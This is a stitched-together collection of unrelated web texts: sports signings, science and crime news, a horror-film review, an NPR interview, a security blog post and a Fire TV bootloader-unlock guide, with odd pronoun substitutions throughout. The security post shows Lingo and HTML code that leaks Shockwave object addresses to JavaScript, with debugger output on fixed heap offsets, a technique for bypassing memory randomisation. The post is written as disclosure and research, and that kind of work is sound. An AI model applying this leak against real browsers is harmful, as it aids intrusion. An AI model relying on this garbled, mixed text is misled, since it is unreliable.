“Anthony is a world-class, premiership-winning player who will further bolster our forward pack for the next few seasons,” Head Coach Brad Arthur said.
“He's played almost 300 NRL games, and along with that experience he'll bring outstanding leadership qualities that will help grow our young talent.”
“Leaving Manly is the toughest thing I've done in my professional life, and I want to thank all those who have helped me along the way,” Watmough said.
“There are many supporters that I have met on my journey thus far who I now call friends and I would like to thank them for their loyal support of me and my family Elle, Claudia & Jake. I can't wait for the challenge that lies ahead.”
25-year-old Brad Takairangi comes to the Eels as a utility player, having previously played 68 first grade games for the Gold Coast Titans and the Sydney Roosters, and will be with the side for the 2015 season.
Outside back Reece Robinson, 27, has played 96 NRL games for the Canberra Raiders and Brisbane Broncos after making their debut at the Queensland club in 2008 and will join the club on a one year deal.
28-year-old forward Danny Wicks, who has played for both the Newcastle Knights and St George-Illawarra Dragons, will join the club on a one-year deal, subject to discussions with the NRL on their registration and any conditions that may apply.
“This is the opportunity that I needed and that I want, and I'm going to give the Parramatta club, Members and fans the best of what I've got,” Wicks said.
“This might only be my second chance, but I know it's my last, and I'm keen to make something of it.”
“It wasn't a hasty decision to sign Danny to the club, but after meeting with them I am confident they have turned their life around and will bring great value to our team,” Seward said.
Former Sea Eagle Richard Fa'aoso, 30, who was forced into early retirement in 2013 after a neck injury, has passed initial medical clearances and will be part of the Eels' side in 2015.
Fa'aoso's return to the game is also subject to continuing discussions with the NRL and any conditions that may apply.
The club has today also announced the re-signing of 26-year-old utility player Joseph Paulo for a two-year extension.
“All of these players bring great talent to the game and show dedication and hard work in their training,” Arthur said.
“I look forward to seeing our team take shape for the 2015 season.”
WASHINGTON — Pollution from Asia's booming economies rises into the stratosphere during the monsoon season then circles the world for years, according to a report out Thursday.
A study by the Boulder, Colorado-based National Center for Atmospheric Research (NCAR) said the strong air circulation patterns linked to Asia's monsoon rainy season serves as a pathway for black carbon, sulfur dioxide, nitrogen oxides and other pollutants to rise into the stratosphere.
The stratosphere is the layer of the atmosphere located some 32 to 40 kilometers (20 to 25 miles) above the Earth's surface.
“The monsoon is one of the most powerful atmospheric circulation systems on the planet, and it happens to form right over a heavily polluted region,” said NCAR scientist William Randel, the study's lead author.
“As a result, the monsoon provides a pathway for transporting pollutants up to the stratosphere.”
Using satellite data and computer models, the scientists found that once the pollutants are in the stratosphere they circulate around the globe for several years.
“Some eventually descend back into the lower atmosphere, while others break apart,” read a statement on the study.
Researchers fear that the impact of Asian pollutants on the stratosphere may increase in the next decades due to fierce industrial growth in countries like China and India.
Scientists however do not know the impact of climate change on the Asian monsoon, unsure if it will strengthen or weaken the monsoon's vertical air movements.
The international study, published in the March 26 edition of the journal Science, was funded by the National Science Foundation together with the National Aeronautics and Space Administration and the Canadian Space Agency.
It was only yesterday afternoon when Bovada released odds for the chances of Marcus Mariota ending up on the Philadelphia Eagles. The original bet looked like this:
Will Marcus Mariota be on the Eagles Roster for game 1 of the 2015 Regular Season?
Yes +400 (4/1)
No -700 (1/7)
...
This is what I wrote at the time:
"If you're not familiar with gambling odds, here's what this means: you have to bet $700 on "No" in order to win $100. If you do you think the Eagles are going to get Mariota, on the other hand, you can bet $100 to win $400.
Now, I'm not going to tell you how to spend your money, but I do think the "Yes" is an interesting bet given the recent moves made by the Eagles. Recent reports indicate that the Eagles are "determined" to make a strong play for the Oregon quarterback."
...
Since then, things have changed quite a bit. It was only two hours after the original post that the line shifted to:
Yes +250 No -400
Then a few hours after that, Bovada took the "Yes" option completely off the board. I woke up early this morning to check on the odds again and now... the entire bet itself is completely off the board.
You can no longer place a bet on the Eagles getting Mariota. Bovada completely took it off the board. http://t.co/UQWTBIc4ZD — Brandon Lee Gowton (@BrandonGowton) March 6, 2015
What this likely means is that a lot of money was pouring in on the "Yes" bet. As you can see, a lot of voters here at BGN thought that was the smart play:
So Bovada got scared and pulled it. BGN Radio host and gambling expert John Barchard offered their take on the situation:
LRT: That is a rarity that they pull a bet off of the board. You only do that if you know you're going to get hammered #ItsHappening — John Barchard (@JohnBarchard) March 6, 2015
And Jimmy Kempski of PhillyVoice added a great touch:
UPDATE: The odds are back up.
Kojiro has since then climbed the mast and succesfully removed the broken part of the mast. Kojiro and the team came to the conclusion that it was impossible to repair this damage and there were too many risks to allow them to continue in these conditions. They decided to retire from the race at 0830 UTC. Kojiro is now safely heading for Cape Town. All the sponsors for this project have said that they are relieved that Kojiro was not injured during this incident. They are all looking forward to assisting Kojiro in their future adventures.
Kojiro's words :
"At 0330 UTC, I heard the mast break from inside of the boat. I quickly went outside to check the damage but the mast had broken in half above the second spreader. I was able to remove the broken piece and I will need to go up again to do some cleaning. The wind was 20 knots at the time I dismasted. I'm okay. I don't need any assistance, and I am heading for Cape Town. I am sorry for everyone who supported me in this journey and would like to particularly thank my sponsors for their kind support."
Copyright by WCMH - All rights reserved
WSAV-TV - SAVANNAH, GA (WSAV) - Savannah-Chatham schools are feeling the hurt of a growing problem nationwide.As more students flow into Savannah-Chatham classrooms, fewer teachers are around to meet their needs
Across the United States, there is a huge drop in the number of students pursuing education degrees.
So right now, Savannah-Chatham schools are holding up the help wanted sign-with 450 openings. To make sure they get those positions filled, the district is using a new program called Alternative Pathways to Teaching.
The program allows anyone with a Bachelor's degree in any field to become a teacher in Georgia through a work-as-you-go certification program that takes one to three years to complete.
"We want to bring in those people who have a lot of field knowledge and a lot of skills," SCCPSS Human Resources Heather Bilton said.
Those hiring see advantages to second-career teachers-they bring a variety of experiences that can help shape students for the real world. But this group is also filling a dire need for a district that's growing at a rate of one school a year as colleges around the nation deal with a 50% drop in students who want to be teachers.
"We're always concerned but that concern has hopefully motivated us to really work hard," Bilton said of the recruitment process.
Colleges blame the 2007 recession for changing students' minds about entering the education field.
To learn more about the program, tap/click here.
The VPD are warning the public after a woman in their 30s was sexually assaulted early this morning in Yaletown. Officers believe the suspect ran past witnesses as they fled, and investigators would like to speak with them.
Just after 3 a.m. Wednesday, the woman was walking south on Cambie Street near Expo Boulevard, when they were approached by a man who threw them to ground and sexually assaulted them A passing driver wasn't sure what was happening and pulled over, which scared off the suspect, and police were called.
Based on the information collected, investigators believe another person walking on the sidewalk may have seen the suspect as they fled eastbound on Expo Boulevard.
“This person may not even know that an assault had just occurred,” says VPD Constable Jason Doucette. “We are hoping that they see this story and contact police immediately.”
The male suspect is described as being in their late 20s to early 30s, with short black hair, a medium build, and wearing a black hoodie and a dark-coloured backpack.
Investigators from the VPD's Sex Crimes Unit would like to hear from anyone who may have been in the area of Cambie Street and Expo Boulevard on Wednesday around 3 a.m., or anyone else who may have information about this assault. Please call 604-717-0602 or Crime Stoppers at 1-800-222-8477.
The Central Intelligence Agency dumped a huge trove of Osama bin Laden documents on Wednesday, but they didn't stay online for long.
The CIA's trove of 470,000 of the al-Qaeda leader's files had become unavailable by Thursday evening and was still offline as of Monday morning.
Reached for comment on Friday, a spokesperson for the CIA's Office of Media Affairs said the issue was a technical one and that the agency expected for it to be fixed soon, though it didn't have a set timetable. The office didn't respond to a request for comment Saturday.
“It could be technical, or it could be that they discovered something that shouldn't have been released and are re-scrubbing,” said Ned Price, a former CIA analyst during the George W. Bush and Barack Obama administrations. “It's very strange that it's been down for days."
The files, which the CIA said in its release had long been available to members of the intelligence community, provide evidence that bin Laden, despite a life declaring themselves at war with the West, had an affinity for its pop culture. Despite not having an internet connection, their hard drives were filled with viral videos like “Charlie Bit My Finger” and a dubbed clip of the British comedy show "Mr. Bean."
Though it's the final archive of documents taken from bin Laden's compound, it's the first one hosted by the CIA itself. Previously, released files are hosted by the Office of the Director of National Intelligence.
All together, the fileset is 332 GB, said Emma Best, a national security journalist and digital archivist who scraped the files before they became unavailable. Best created a zipped file of the release, which is now available at the Internet Archive once.
Despite the long wait time, it's feasible that the CIA's public-facing site was simply unprepared for such a gigantic fileset that would be visited by large numbers of people, said Jason Scott, a curator at the Internet Archive.
“I will tell you that when the CIA (or most companies) put out a larger dataset of any amount (even as ‘small' as a few hundred megs) and it in any way goes viral, especially in a media link, it will often just crush their infrastructure,” Scott told BuzzFeed News. "Even Internet Archive has stuff we need to do when something is a hit. I've crushed IA before and downloading is all we do!”
“We are unquestionably outsiders trying to speculate, but I doubt it's ‘oh no, we didn't expect this level of scrutiny' and more ‘oh crap, that was way more downloads than expected,'” they said.
Procedurally generated trees, landscapes and color palettes form striking visuals together with evocative soundscapes.
There's no interaction here, so just turn up the volume, sit back and be hypnotized.
Background and technique
This interactive experience was a study in how to create varied landscapes evoking many different moods using only simple means. Each scene consists of just a flat plane and a distribution of trees, all of it with simple colors without textures. Additionally there is a light source, variable fog amount, and sometimes a star-field.
The trees are procedurally generated using L-systems and are distributed in many different ways using multiple noise functions.
An important element of evoking different moods despite the simple means is in the color selection. A palette is created by choosing an initial color and creating either a pair of complementary colors from it, or a color triad. The initial color determines the saturation and value (brightness) of all of them. Some extra color variations are created, and each scene element is then assigned a color from this palette. Each scene element knows its "normal" color and will attempt to choose a color from the palette similar to that. This will often result in natural landscapes with green grass, blue sky, brown branches, and green to red leaves. Sometimes though, nothing close to those colors will be available in the palette, and the result may be more surrealistic.
Contributions
Geometry & Wind by Morten Nobel-Jørgensen (@mortennobel)
Composition & Colors by Rune Skovbo Johansen (@runevision)
Soundscape & Music by Andreas Frostholm
Source code
The source code for this project is available on GitHub under the MIT license. If you do something cool with it, let us know!
"Friday the 13th" is about the best "Friday the 13th" movie you could hope for. Its technical credits are excellent. It has a lot of scary and gruesome killings. Not a whole lot of acting is required. If that's what you want to find out, you can stop reading.
OK, now it's just us in the room. You're not planning to see "Friday the 13th," and you wonder why anyone else is. Since the original movie came out in 1980, there were 10 more films -- sequels, retreads, fresh starts, variations, whatever. Now we get the 2009 "Friday the 13th," which is billed as a "remake" of the original.
Advertisement
That it is clearly not. Let me test you with a trick question: How many kids did Jason kill in the first movie? The answer is none, since Mrs. Voorhees, their mother, did all of the killings, in revenge on the camp counselors who let their beloved son drown in Crystal Lake.
Mrs. Voorhees is decapitated at the end of No. 1, and again in the new version, so the new movie is technically a remake up until that point -- but the decapitation, although preceded by several murders, comes before this movie's title card, so everything after that point is new.
It will come as little surprise that Jason still lives in the woods around Crystal Lake and is still sore about the decapitation of their mom. Jason must be sore in general.
So far in the series, they have been drowned, sliced by a machete in the shoulder, hit with an ax in the head, supposedly cremated, aped by a copycat killer, buried, resurrected with a lightning bolt, chained to a boulder and thrown in the lake again, resurrected by telekinesis, drowned again, resurrected by an underwater electrical surge, melted by toxic waste, killed by the FBI, resurrected through the possession of another body, returned to their own body, thrown into hell, used for research, frozen cryogenically, thawed, blown into space, freed to continue their murder spree on Earth 2, returned to the present, faced off against Freddy Krueger of "Nightmare on Elm Street," drowned again with him, and made to emerge from Crystal Lake with Freddy's head, which winks.
I know what you're thinking. No, I haven't seen them all. Wikipedia saw them so I didn't have to. The question arises: Why does Jason continue their miserable existence, when their memoirs would command a seven-figure advance, easy? There is another question. In the 1980 movie, 20 years had already passed since Jason first went to sleep with the fishes. Assuming they were a camper aged 12, they would have been 32 in 1980, and in 2009, they are 61. That helps explain why one of my fellow critics at the screening was wearing an AARP T-shirt.
Advertisement
Spoiler warning! At the end of this film, Jason is whacked with an ax and a board, throttled with a chain and dragged into a wood chipper, although we fade to black just before the chips start to fly, and we are reminded of Marge Gunderson's immortal words. The next day brings a dawn, as one so often does, and two survivors sit on the old pier with Jason's body wrapped and tied in canvas. Then they throw them into Crystal Lake. Anyone who thinks they can drown Jason Voorhees for the fifth time is a cockeyed optimist.
Note: In my research I discovered that the scientific name for fear of Friday the 13th is paraskavedekatriaphobia. I envision a new franchise: "Paraskavedekatriaphobia: A New Beginning," "Paraskavedekatriaphobia: Jason Lives," "Paraskavedekatriaphobia: Freddy's Nightmare," etc.
WASHINGTON, Oct. 30 — Moments before a Mississippi prisoner was scheduled to die by lethal injection Tuesday evening, the Supreme Court granted them a stay of execution and thus gave a nearly indisputable indication that a majority intends to block all executions until the court decides a lethal injection case from Kentucky next spring.
There were two dissenters, Justices Antonin Scalia and Samuel A. Alito Jr., but neither they nor the majority gave reasons for their positions. Because only five votes are required for a stay of execution, it is not clear whether all the remaining seven justices supported it.
The stay will remain in effect until the full court reviews an appeal filed on Monday by lawyers for the inmate, Earl W. Berry, who is on death row for having killed a woman 20 years ago. While there is no schedule for that review, it almost surely will not take place until the court decides the Kentucky case, Baze v. Rees, which will be argued in January. The issue in that case is not the constitutionality of lethal injection as such, but rather a more procedural question: how judges should evaluate claims that the particular combination of drugs used to bring about death causes suffering that amounts to cruel and unusual punishment, in violation of the Eighth Amendment.
Even without a written opinion, the Supreme Court's action Tuesday night clarified a situation that had become increasingly confusing as state courts and the lower federal courts, without further guidance from the justices, wrestled with claims from a growing number of death-row inmates that their imminent executions should be put on hold.
Advertisement Continue reading the main story
State and lower federal courts are likely to interpret the Supreme Court's action as a signal that they should postpone executions in their jurisdictions. As a result, the justices will probably not have to consider any more last-minute applications from inmates while the de facto moratorium is in effect.
San Francisco police confirmed Wednesday night a man was killed in an officer-involved shooting in the Bayview area. San Francisco Police Chief Gregory Suhr said a man, who matched a description of a suspect who stabbed someone in the area around the same time, was holding a knife when they were shot and killed by police, the San Francisco Examiner reports. Suhr added that officers fired beanbags and took other shots at the ground before the fatal shooting. An Instagram video surfaced online purporting to show the moments before the man was shot and killed. Police can be seen surrounding the man, who is shuffling to the ground before the camera cuts away and a barrage of bullets is heard over audio. Suhr said authorities have witness video but could not confirm the Instagram post.
From Wikipedia:
In computing, type introspection is the ability for a program to examine the type or properties of an object at runtime.
These days it seems there is quite a lot of research being done on various ways to disclose the contents of an application's memory. With the increasing prevalence of exploit mitigations intended to randomize the location of data in a process, the value of such memory disclosures is becoming very apparent.
In this post I'd like to share a very trite example of an information leak I ran across while poking around with Adobe's Shockwave Player.
Adobe Shockwave is a piece of software implemented as a browser plug-in that Adobe claims runs on over 450 million desktop systems. The Player renders Adobe Director files which can contain 3D media, audio, video, and other web content. Additionally, Shockwave contains an interpreter for the Lingo programming language which allows a developer to embed scripting code to perform a multitude of tasks via the Lingo API.
Lingo supports type introspection and this functionality has many legitimate uses, but for the purposes of this blog post I'll demonstrate a potentially nasty side effect that can result.
As it turns out, if a Lingo programmer retrieves a reference to a created object and attempts to print it out, the interpreter will actually disclose where in memory the object resides. Several other languages support this, the first that comes to mind is Python via the id() function:
>>> a = "hihi"
>>> hex(id(a))
'0x22c83e0'
>>>
For a dynamic language that is not being executed in the context of a browser, this is just fine. However, such functionality can be abused to aid in exploitation of memory corruption vulnerabilities when in the context of another application.
Consider the following Lingo code:
on startMovie
x = window("stage").movie
trace(x)
end
When this is executed inside the Director application (used to create Shockwave files), the Message window outputs the following:
-- <Object _movie 2 b50244>
When executed in the context of a browser and combined with the gotoNetPage API, this can be leveraged to send that string back to a javascript function:
gotoNetPage("javascript: void ( disclose('" & x & "') );")
The HTML I used to embed the Shockwave file and to display the object properties looks like this:
<html>
<script language="javascript">
function disclose(x) {
alert(x);
}
</script>
<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258"
codebase="http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab#version=11,5,0,593"
ID=test width=600 height=600 VIEWASTEXT>
<param name=src value="test.dir">
<param name=swRemote value="swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' ">
<param name=swStretchStyle value=none>
<param name=PlayerVersion value=11>
<PARAM NAME=bgColor VALUE=#FFFFFF>
</embed>
</object>
</body>
</html>
When this is executed in a browser, our alert fires and displays the string:
This address can be verified by attaching a debugger to the browser process and inspecting that address:
0:022> !address 0x3db01fc
03db0000 : 03db0000 - 00102000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageHeap
Handle 00150000
0:022> !heap -p -a 0x3db01fc
address 03db01fc found in
_HEAP @ 150000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
03db0018 20000 0000 [0b] 03db0020 100000 - (busy VirtualAlloc)
Here we can see the address is in the heap and is part of an allocation of size 0x100000. This is because Shockwave utilizes a custom memory manager on which Logan Brown and I gave a presentation at CanSecWest in 2011.
What is interesting to note is that the address of the “_movie” object is located 0x1dc bytes from the start of the allocation. As it turns out, the _movie object is always placed at that offset. This is interesting from an exploitation standpoint because there are certain function pointers that the memory manager uses that are also at fixed offsets from the start of that allocation:
0:022> u poi(0x03db0020+0x10) L3
IML32!Ordinal2064+0x6b70:
6907d880 8b4c2404 mov ecx,dword ptr [esp+4]
6907d884 8b41fc mov eax,dword ptr [ecx-4]
6907d887 8b5014 mov edx,dword ptr [eax+14h]
The address of other objects can also be disclosed, but I chose to show the _movie object as it is one of the first allocated by the custom memory manager and is of particular interest due to its consistently relative offset from the allocation shown above.
That's it… I ran across this “intended functionality” some time ago, but didn't bother to discuss it due to the fact that it is only useful when exploiting a browser-based vulnerability and can only be utilized if the browser has the Shockwave plug-in installed.
—
Aaron Portnoy
@aaronportnoy
SFMTA to Ban Cars on Kezar, Stanyan, Haight Street for 4/20 This Sunday
The SFMTA announced that cars will be banned on several major streets for the 4/20 gathering on the east end of Golden Gate Park this Sunday.
From 10 a.m. to 6 p.m., cars will be banned on Kezar Drive, Stanyan Street between Frederick and Oak Streets, and Haight Street between Masonic Avenue and Stanyan.
Drivers swarming the area for the event — many from out of town and not necessarily in their sharpest state of mind — typically create a traffic mess in and around the eastern park. Illegal parking is rampant, Muni is brought to a halt, and sidewalks fill up. The car closures, the first of their kind for 4/20, could help simplify traffic flow, keep transit moving, and provide ample room for wandering.
Muni buses will be allowed through the pedestrianized streets, the SFMTA said, but “personnel from SFPD and SFMTA will determine to re-route Muni buses as crowds grow. Muni bus re-routes will be expected to begin at approximately 3 p.m.”
Supervisor London Breed and SFPD Chief Greg Suhr also held a press conference Wednesday to tell 4/20 revelers to keep things under control, promising a crackdown on parking violations.
Since 4/20 falls on a Sunday this year, the de facto Sunday Streets network will be complemented by the weekly car closure on John F. Kennedy Drive.
The area has been described as an 'Ali Baba's cave' of energy deposits Getty Images
While the world waited for an invasion of mainland Ukraine, Russia quietly gained a chunk of territory the size of Switzerland 4,000 miles away.
In marked contrast to the annexation of Crimea, Russia conquered it without deploying soldiers on foreign soil, and with the full approval of the international community.
It has emerged that on March 15 the Commission on the Limits of the Continental Shelf, a treaty body run by the United Nations, approved Russia's longstanding claim to a section of sea-bed in the Far East.
Sergei Donskoy, the Russian minister for natural resources, described the area, which measures 20,000 square miles (52,000 sq km) in the Sea of Okhotsk, as an “Ali Baba's cave” of energy deposits.
However, despite the obvious benefits, in…
Gainesville, Florida's Frameworks aren't on your radar. If you're into stuff like Slint and Sincebyman, well, they should be on your radar. Self-described–we think they're trying to be funny–as “Lounge Screamo” or “Tropical Punk”, Frameworks recalls a time when playing hardcore with a bit of gloom in it wasn't cool or respected. You had to be macho/strongman like all the bridge ‘n' tunnel shit that came out of the Northeastern Corridor. Well, that is until Converge and Cave In and ISIS blew out the meatheads.
Recorded by Jack Shirley (Deafheaven, Comadre) at their Atomic Garden Studios in San Francisco, Loom sounds massive yet decidedly lo-tech. Case in point, “Familiar Haze”, which was, as guitarist Cory Fischer points out, inspired by the movie Lords of Salem. “‘Familiar Haze' was conjured up after seeing Lords of Salem. In the movie there's this extremely dark, depressive chord progression that puts women in this satanic/sexual trance. I was instantly attracted to the progression and the idea of how moving music can be, even if it is in this absurd evil way. The progression in ‘Familiar Haze' was heavily influenced by that, fitting perfectly into the albums darker depressive side. The song sort of formed around that.”
OK, then. Lock up your women. Give them noise-canceling headphones before you crank up “Familiar Haze” on your laptop. We're not responsible for what Fisher and Frameworks have conjured with it.
** Frameworks' new album, Loom, is out April 29th on Topshelf Records. It's available HERE really easy like. Enjoy the sounds of the end. Or, of sexual chocolate.
This article is over 1 year old
Wave of attacks which had already killed six people spreads to country's second city, Blantyre, where epileptic man is ‘torched'
Malawi mobs kill two more people accused of being vampires
A wave of attacks in Malawi against people accused of vampirism has spread to its second-biggest city of Blantyre, where vigilante mobs killed two people, police said on Thursday.
UN moves staff after mobs kill five in Malawi vampire scare Read more
The lynch mob attacks began in mid-September in a country that is one of the world's poorest and where belief in witchcraft is widespread.
Six people have already died in the attacks.
In Blantyre on Thursday, mobs “torched a 22-year-old epileptic man in Chileka, and another man was stoned to death … after being suspected of being a bloodsucker”, said Ramsy Mushani, a national police spokesperson.
A Reuters reporter witnessed the first incident at a police checkpoint on a road leading to the city's airport. A family member confirmed the man was epileptic and that they were killed while walking home from a nearby hospital.
The Malawian president, Peter Mutharika, has been visiting parts of the country affected by the vampire scare, trying to prevent the deaths of innocent people.
The UN and US embassy have blacklisted several districts in Malawi as dangerous zones for staffers and nationals. Earlier this month the UN pulled staff out of two districts in southern Malawi.
Hurt protester Scott Olsen was 'provoking no one'
OAKLAND -- Scott Olsen, a 24-year-old Marine who served two tours of duty in Iraq, stood calmly in front of a police line as tear gas canisters that officers shot into the Occupy Oakland protest Tuesday night whizzed past their head.
"He was standing perfectly still, provoking no one," said Raleigh Latham, an Oakland filmmaker shooting footage of the confrontation between police and hundreds of protesters at 14th Street and Broadway. "If something didn't hit them directly in the face, then it went off close to their head and knocked them down."
The something was a projectile that apparently came from police lines, fractured Olsen's skull and put them in Highland General Hospital. Doctors upgraded their condition Thursday from critical to fair, and said they expect them to make a full recovery.
Their parents flew in from Wisconsin and spent Thursday at their bedside. When they arrived, Olsen "just blossomed," said Highland's chief of surgery, Dr. Alden Harken.
Olsen's injury added to the national attention focused on Occupy Oakland in the aftermath of the repeated police tear-gassing of protesters Tuesday. In Las Vegas, protesters projected a photo of the Marine in uniform onto the corrugated-metal side of a building at their camp, the Associated Press reported. Vigils for Olsen were planned at Occupy sites in other cities.
Mayor's visit
Mayor Jean Quan visited Olsen in the hospital, told them they were sorry for what happened and promised an investigation, said Highland spokesperson Vintage Foster.
Olsen, a Daly City resident and member of Iraq Veterans Against the War, fell to the ground after police lobbed or fired an object - possibly a tear gas canister - at a group of protesters.
While Olsen lay wounded in the street, other protesters rushed to their aid. Video footage appears to show an officer tossing another canister toward the group helping him.
One protester can be heard screaming "What the f-" at police as the device emits a loud bang, while a demonstrator angrily pounds their sign on the street. The group eventually carried Olsen away.
Interim Police Chief Howard Jordan called the incident "unfortunate."
"I wish that it didn't happen," Jordan said. "Our goal, obviously, is not to cause injury to anyone. ... We regret that this injury happened."
Officers from 18 law enforcement agencies were on the streets of Oakland Tuesday night, and authorities said they are trying to determine which officers were involved in Olsen's injury. Quan said officers from outside agencies had been told they had to abide by Oakland police procedures.
Olsen joined the Marines in 2006, served two tours in Iraq and was discharged in 2010, according to Iraq Veterans Against the War. Now a systems administrator at San Francisco software firm OPSWAT Inc., they had spent most nights during the last few weeks at the Occupy SF camp, said their roommate, Keith Shannon.
"He'd leave work, head there, sleep there and go to work the next day," Shannon said. "We were really against the fact that the banks and corporations were not held accountable for what they did."
BART to Oakland
When Olsen heard that protesters at Occupy Oakland were asking for support, they took BART to Oakland and joined in the protest, Shannon said.
Olsen knew they might be arrested, but didn't have any idea the demonstration would get as violent as it did, Shannon said.
Harken said Olsen had suffered a 2- to 3-inch fracture on the left side of their skull.  They are able to write and move, but is having trouble speaking, Harken said.
Olsen has a bruise on their brain that is causing swelling, but they should recover fully without needing surgery, Harken said.
Olsen was dropped off at the hospital by people in a private car and was unconscious for 12 hours, Harken said.  They are unaware of the global interest in their condition.
"He wouldn't be able to comprehend it," the doctor said.
Georgia's National Police Corruption Project
Georgian President Mikhail Saakashvili has targeted corruption in their first year of office. To that end, they revamped the police force — by firing all of the traffic police in their country, cutting 30,000 police from the payroll. Robert Siegel talks with Saakashvili, who is in New York for a world summit of the United Nations.
MELISSA BLOCK, host:
This is ALL THINGS CONSIDERED from NPR News. I'm Melissa Block.
ROBERT SIEGEL, host:
And I'm Robert Siegel.
Among the world leaders converging on New York this week for a United Nations summit is Mikhail Saakashvili.  They are the president of the Republic of Georgia, the former Soviet republic. Mr. Saakashvili is an American-educated lawyer who led Georgia's Rose Revolution last year. They came to our New York bureau to talk about one area of reform that their government has undertaken, reforming the police.
President MIKHAIL SAAKASHVILI (Republic of Georgia): Basically, we had one of the most corrupt police forces. And the way it functioned was very simple. Government told the police officers, `You are supposed to be out there, keep order. You need to have some kind of cars, but we are not going to buy for you any cars. We are not going to put in any gasoline in that car, so you have to get money for it yourselves. You need to wear some kind of uniforms. We don't care where you get them from. And you also should sustain yourself, I mean, of course, because we are not even going to pay you because the payment was pretty symbolic. And not only do you have to take bribes from the people but you also have to share part of your corrupt income with your superiors--I mean, with the government that appointed you.'
SIEGEL: The cop was a thug with a franchise from the government (unintelligible) yeah.
Pres. SAAKASHVILI: Absolutely, absolutely, that was what it was. And so what we did--I mean, for the first few months we tried to temper it. You know, we urged them to be honest, you know, increased their pay. It didn't help. So, in the end, basically, 80 to 90 percent of all police officers were fired.
SIEGEL: And how many individuals are we talking about ...(unintelligible)?
Pres. SAAKASHVILI: We are talking about 25 to 30,000 people.
SIEGEL: All of them fired?
Pres. SAAKASHVILI: Yeah,
SIEGEL: Yeah.
Pres. SAAKASHVILI: And it was pretty miserable. Now people thought that we would have disaster because it was in the beginning of holiday season; therefore, that we will have a real chaos with traffic disasters. Nothing like of this sort has happened because what it proved was that this police was not only producing order, it was producing disorder.
So then we had new guys recruited. And it took us two to three months to find good guys and to give them initial training at an academy which is sponsored by the US. But what we also did, we gave them new, nice uniforms that look very much unlike the old Soviet ones. We gave them new, nice German cars, American radios, the US kind of looking badges and painting which we gave them. So...
SIEGEL: Appearances are important here, you're saying?
Pres. SAAKASHVILI: Yeah, it is.
SIEGEL: Yeah.
Pres. SAAKASHVILI: But besides, we gave them 20 times, in some cases, higher salaries, which they started to...
SIEGEL: Twenty times higher salaries?
Pres. SAAKASHVILI: Well, we are talking very roughly--I mean, we--they used to get like 30 to $40 and we got them minimum salary now--minimum money is 3 to $400, but we are talking about men...
SIEGEL: Per week? Per week?
Pres. SAAKASHVILI: These are monthly, but for Eastern Europe these are pretty high salaries. And...
SIEGEL: Now what do you do with the 30,000 cops you fired? Are they barred forever from becoming police officers? Are they barred from public employment? What happens to them?
Pres. SAAKASHVILI: No. First of all, most of them did have savings because they were corrupt and they had money. You know, in the beginning we had trouble recruiting people because many people would not take jobs that had such a bad reputation. Now there is a long line of applicants.
SIEGEL: Is the crime rate in Tbilisi lower today than it was three years ago, say?
Pres. SAAKASHVILI: You know what? If you look at figures it's much, much higher, but I'll tell you why. Because police in the old system would not register crimes. Nobody--many people wouldn't even bother going to the police because it was extra headache. Now people for even the small family conflict, a lot of the spouse will go and call the police or somebody--I mean, I had neighbored that, say, lose their key and they will call the police and say, I mean, `We lost our keys. Would you please help us to open the door?' And all these cases get registered.
But I think that the overall picture of crime has decreased. The old police used to beat up people. They basically used what amounted to torture to extort the evidence. And the new police force was educated and is controlled in a way where nothing like this--there is zero tolerance towards torture. Zero tolerance. Everybody thought that there was no way to keep crimes checked unless you occasionally beat them up or managed them with beating them up or blackmail them into something. No, our examples show that you can reverse the crime trend even by being civilized.
SIEGEL: Well, President Saakashvili, it's very good to talk with you once again.
Pres. SAAKASHVILI: Thank you, enjoyed it.
SIEGEL: Mikhail Saakashvili is the president of Georgia. He's in New York attending the session of the General Assembly of the United Nations.
Copyright © 2005 NPR. All rights reserved. Visit our website terms of use and permissions pages at www.npr.org for further information.
NPR transcripts are created on a rush deadline by Verb8tm, Inc., an NPR contractor, and produced using a proprietary transcription process developed with NPR. This text may not be in its final form and may be updated or revised in the future. Accuracy and availability may vary. The authoritative record of NPR's programming is the audio record.
The great rbox has done it again. They have just released a method to partially unlock the Fire TV's bootloader. It's only a partial unlock because it does not enable fastboot flashing, which means it requires that your Fire TV already be rooted. Sorry, but this release does not help those with unrootable Fire TVs gain root. What it does do is make the Fire TV a little more modding friendly, which will hopefully lead to even cooler mods in the future. For the time being, the most important thing to know is that an unlocked bootloader will be a requirement to installing future updates to ClockworkMod custom recovery. Starting with ClockworkMod version 6.0.5.1.4, your Fire TV will need to have an unlocked bootloader to install ClockworkMod for the first time or to install ClockworkMod updates.
Important
If your Fire TV software is…
Any of rbox's Pre-Rooted Custom ROMs , then you DO NOT need to downgrade. You may proceed with this guide and unlock your bootloader.
, then you DO NOT need to downgrade. You may proceed with this guide and unlock your bootloader. Stock Version 51.1.0_user_510047320, 51.1.0.1_user_510055620, or 51.1.0.2_user_510058520 , then you DO NOT need to downgrade. You may proceed with this guide and unlock your bootloader.
, then you DO NOT need to downgrade. You may proceed with this guide and unlock your bootloader. Stock Version 51.1.1.0_user_511069920, or 51.1.1.0_user_511070220 , then you DO need to downgrade before unlocking your bootloader. Follow my downgrade guide and downgrade your Fire TV to version 51.1.0.2_user_510058520
, then you need to downgrade before unlocking your bootloader. Follow my downgrade guide and downgrade your Fire TV to version 51.1.0.2_user_510058520 Stock Version 51.1.2.0_user_512073320 or Newer, then you cannot unlock your bootloader and cannot follow this guide because there is currently no way to root your Fire TV.
Guide
Be sure your Fire TV is rooted and that you've read the section above to determine if you need to downgrade your Fire TV before proceeding with this guide. Download the aftv-unlock file from rbox's XDA Post. The download link is near the bottom. Connect to your Fire TV via ADB Transfer the file you downloaded in step 1 to your Fire TV by running the following ADB command:
adb push aftv-unlock /data/local/tmp/
(Note: This assumes the file you downloaded is in the same directory as ADB, otherwise enter the full path to the file, like this:
adb push C:\full\path\aftv-unlock /data/local/tmp/ Run the command:
adb shell Run the command:
chmod 755 /data/local/tmp/aftv-unlock Run the command:
su
(Note: If this is the first time you've ever run the command su , a pop-up will appear on the Fire TV screen where you will need to select “Grant” within a few seconds before it disappears. If you miss it, then run this command again.) Run the command:
/data/local/tmp/aftv-unlock unlock If done successfully, you will see the following message:
Attempting to unlock…
All done! Run the command:
exit Run the command (yes, again):
exit
